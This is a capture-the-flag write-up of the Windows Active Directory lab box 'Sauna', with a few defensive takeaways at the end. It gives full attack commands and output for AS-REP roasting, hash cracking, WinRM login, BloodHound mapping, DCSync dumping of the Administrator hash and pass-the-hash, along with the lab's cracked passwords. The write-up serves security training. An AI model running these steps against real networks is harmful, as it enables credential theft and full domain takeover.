Sauna
Overview
Sauna is an easy Windows Active Directory box. The target runs a bank
website that lists employee names. Converting those names into likely AD username
formats reveals one account — fsmith — with Kerberos pre-authentication
disabled, making it AS-REP roastable. Cracking the roasted hash gives a working
WinRM login. Once inside, WinPEAS finds autologon credentials for a second
account (svc_loanmgr) that BloodHound shows has DCSync rights over the
domain. Dumping the Administrator NTLM hash via DCSync allows a pass-the-hash
WinRM session as domain admin.
Path: employee name enumeration → AS-REP roasting (fsmith) →
WinPEAS autologon creds → svc_loanmgr DCSync → Administrator hash → root.
Enumeration
A full port scan reveals the standard Windows domain controller fingerprint:
DNS, Kerberos, LDAP, SMB, WinRM, and IIS on port 80 — with the domain
EGOTISTICAL-BANK.LOCAL.
$ nmap -p- -A 10.129.95.180
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap Microsoft Windows AD LDAP (Domain: EGOTISTICAL-BANK.LOCAL)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows AD LDAP (Domain: EGOTISTICAL-BANK.LOCAL)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM)
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: SAUNA; OS: Windows

Adding EGOTISTICAL-BANK.LOCAL to /etc/hosts, the website shows a public team
page listing six employees:

Fergus Smith Hugo Bear Steven Kerb
Shaun Coins Bowie Taylor Sophie Driver
Foothold — AS-REP Roasting
I generated a username wordlist from the six names in common AD formats
(first.last, flast, firstl) and ran GetNPUsers.py against the domain to
check for accounts with pre-authentication disabled:
$ GetNPUsers.py -usersfile usersMaybe EGOTISTICAL-BANK.LOCAL/ -format hashcat -outputfile hashes.txt

fsmith has pre-auth disabled. Cracking the resulting hash against rockyou.txt:
$ hashcat -m 18200 -a 0 hashes.txt /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt

Credentials: fsmith : Thestrokes23
User
With WinRM open, logging in is straightforward:
$ evil-winrm -u fsmith -p 'Thestrokes23' -i EGOTISTICAL-BANK.LOCAL
whoami /all shows fsmith has no interesting privileges beyond the default
Remote Management Users membership — no direct path to escalation from here.
Privilege Escalation — Autologon Credentials and DCSync
Running WinPEAS surfaces AutoLogon registry credentials:

svc_loanmanager : Moneymakestheworldgoround!
Note: the actual AD account name is svc_loanmgr (truncated). A BloodHound
collection using fsmith’s credentials maps the domain graph:
$ python3 /tools/bloodhoundCE-py/bloodhound.py \
-u fsmith -p "Thestrokes23" \
-d EGOTISTICAL-BANK.LOCAL -c All --zip \
-ns 10.129.95.180

BloodHound shows svc_loanmgr has DCSync rights (DS-Replication-Get-Changes-All):

DCSync lets us impersonate a domain controller and pull NTLM hashes for any account directly from NTDS.DIT:
$ secretsdump.py svc_loanmgr:'Moneymakestheworldgoround!'@10.129.95.180 \
-just-dc-user Administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Root
With the Administrator NTLM hash in hand, a pass-the-hash WinRM session gives domain admin access:
$ evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i EGOTISTICAL-BANK.LOCAL

Takeaways
- AS-REP roasting requires only a username list — no prior credentials needed. Accounts with pre-auth disabled are offline crackable and should not exist in production; the fix is enforcing Kerberos pre-authentication for all accounts.
- AutoLogon credentials in the registry are a common lateral-movement path. WinPEAS reliably surfaces them; once an account with DCSync rights is compromised, the entire domain is effectively owned without touching a Domain Controller interactively.